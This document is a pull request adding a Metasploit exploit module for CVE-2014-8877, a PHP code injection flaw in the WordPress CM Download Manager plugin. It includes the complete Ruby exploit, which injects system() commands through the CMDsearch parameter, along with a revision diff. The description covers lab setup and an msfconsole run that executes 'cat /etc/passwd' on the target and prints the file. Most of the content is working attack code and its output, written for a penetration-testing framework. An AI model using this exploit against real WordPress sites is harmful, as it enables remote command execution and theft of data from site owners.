### PR TITLE
Add module for Wordpress CM Download Manager plugin (CVE-2014-8877)

### DIFF
--- a/modules/exploits/unix/webapp/wp_cmdownloadmanager_cmdsearch_exec.rb
+++ b/modules/exploits/unix/webapp/wp_cmdownloadmanager_cmdsearch_exec.rb
@@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::HTTP::Wordpress
-  include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(update_info(
@@ -29,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote
       ['CVE', '2014-8877'],
       ['WPVDB', '7679'],
       ['URL', 'http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en'],
-      ['URL', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877'],
     ],
     'Privileged'     => false,
     'Payload'        =>
@@ -53,26 +51,26 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit 
     wrapper = "#{rand_text_alpha(10)}"
-    p = Rex::Text.uri_encode("\".system(\"echo #{wrapper};#{payload.encoded};echo #{wrapper};\").\"")
-    vulnUrl = normalize_uri(datastore['TARGETURI']) + "/cmdownloads/?CMDsearch=#{p}" 
 
-    res = send_request_raw({
-        'uri'     => vulnUrl,
-        'method'  => 'GET',
-        'headers' =>
-        {
-          'Connection' => 'Close',
-        }
-      }, 25)
+    vulnUrl = normalize_uri(datastore['TARGETURI'], "cmdownloads")
+    p = "\".system(\"echo #{wrapper};#{payload.encoded};echo #{wrapper};\").\""
 
-    if (res)
+    res = send_request_cgi({
+      'uri'      => vulnUrl,
+      'vars_get' =>
+      {
+        'CMDsearch' => p
+      }
+    })
+
+    if res
       print_status("The server returned: #{res.code} #{res.message}")
 
-      m = res.body.match(/#{wrapper}\n(.*?)\n#{wrapper}/m)
+      m = res.body.match(/#{Regexp.escape(wrapper)}\n(.+?)\n#{Regexp.escape(wrapper)}/m)
 
-      if (m)
+      if m
         print_status("Command output from the server:")
-        print("\n" + m[1] + "\n\n")
+        print_status(m[1])
       else
         print_status("This server may not be vulnerable")
       end

--- a/modules/exploits/unix/webapp/wp_cmdownloadmanager_cmdsearch_exec.rb
+++ b/modules/exploits/unix/webapp/wp_cmdownloadmanager_cmdsearch_exec.rb
@@ -1,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(
+    info,
+    'Name'           => 'Wordpress CM Download Manager plugin (cm-download-manager) code injection',
+    'Description'    => %q{
+      CM Download Manager plugin does not correctly sanitise the user input which allows remote attackers to execute arbitrary PHP code via the CMDsearch parameter to cmdownloads/, which is processed by the PHP 'create_function' function. Vulnerability was fixed in version 2.0.4
+    },
+    'Author'         =>
+    [
+      'Le Ngoc Phi', # initial discovery
+      'mzet' # metasploit module
+    ],
+    'License'        => MSF_LICENSE,
+    'References'     =>
+    [
+      ['CVE', '2014-8877'],
+      ['WPVDB', '7679'],
+      ['URL', 'http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en'],
+      ['URL', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877'],
+    ],
+    'Privileged'     => false,
+    'Payload'        =>
+       {
+         'Compat'      =>
+           {
+             'PayloadType' => 'cmd',
+             'RequiredCmd' => 'generic bash netcat',
+           }
+       },
+    'Platform'       => ['unix'],
+    'Arch'           => ARCH_CMD,
+    'Targets'        => [['Automatic', {}]],
+    'DefaultTarget'  => 0,
+    'DisclosureDate' => 'Nov 14 2014'))
+  end
+
+  def check
+    check_plugin_version_from_readme('cm-download-manager', '2.0.4')
+  end
+
+  def exploit 
+    wrapper = "#{rand_text_alpha(10)}"
+    p = Rex::Text.uri_encode("\".system(\"echo #{wrapper};#{payload.encoded};echo #{wrapper};\").\"")
+    vulnUrl = normalize_uri(datastore['TARGETURI']) + "/cmdownloads/?CMDsearch=#{p}" 
+
+    res = send_request_raw({
+        'uri'     => vulnUrl,
+        'method'  => 'GET',
+        'headers' =>
+        {
+          'Connection' => 'Close',
+        }
+      }, 25)
+
+    if (res)
+      print_status("The server returned: #{res.code} #{res.message}")
+
+      m = res.body.match(/#{wrapper}\n(.*?)\n#{wrapper}/m)
+
+      if (m)
+        print_status("Command output from the server:")
+        print("\n" + m[1] + "\n\n")
+      else
+        print_status("This server may not be vulnerable")
+      end
+    else
+      print_status("No response from the server")
+    end
+  end
+
+end
+


### PR DESCRIPTION
## Preparation
- Install latest version of Wordpress on Linux machine
- Get vulnerable version of Wordpress CM Download Manager plugin: `svn co -r 1007950 http://plugins.svn.wordpress.org/cm-download-manager/trunk/ cm-dw-manager`
- Prepare plugin for installation: `find cm-dw-manager/ -type d -name .svn -print0 | xargs -0 rm -rf; zip -r cm-download-manager.zip cm-dw-manager/`
- Upload it to `wp-content/plugins` directory. Unzip. Activate in admin panel.
## Verification
- Run msfconsole
- select, configure & check exploit:

```
msf > use exploits/unix/webapp/wp_cmdownloadmanager_cmdsearch_execmsf exploit(wp_cmdownloadmanager_cmdsearch_exec) > set RHOST 192.168.77.239
RHOST => 192.168.77.239
msf exploit(wp_cmdownloadmanager_cmdsearch_exec) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf exploit(wp_cmdownloadmanager_cmdsearch_exec) > show options

Module options (exploit/unix/webapp/wp_cmdownloadmanager_cmdsearch_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST      192.168.77.239   yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /wordpress       yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(wp_cmdownloadmanager_cmdsearch_exec) > check
[*] 192.168.77.239:80 - The target appears to be vulnerable.
msf exploit(wp_cmdownloadmanager_cmdsearch_exec) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf exploit(wp_cmdownloadmanager_cmdsearch_exec) > set CMD "cat /etc/passwd"
CMD => cat /etc/passwd
```
- Run exploit:

```
msf exploit(wp_cmdownloadmanager_cmdsearch_exec) > exploit

[*] The server returned: 200 OK
[*] Command output from the server:

root:x:0:0:root:/root:/bin/bash
...
```
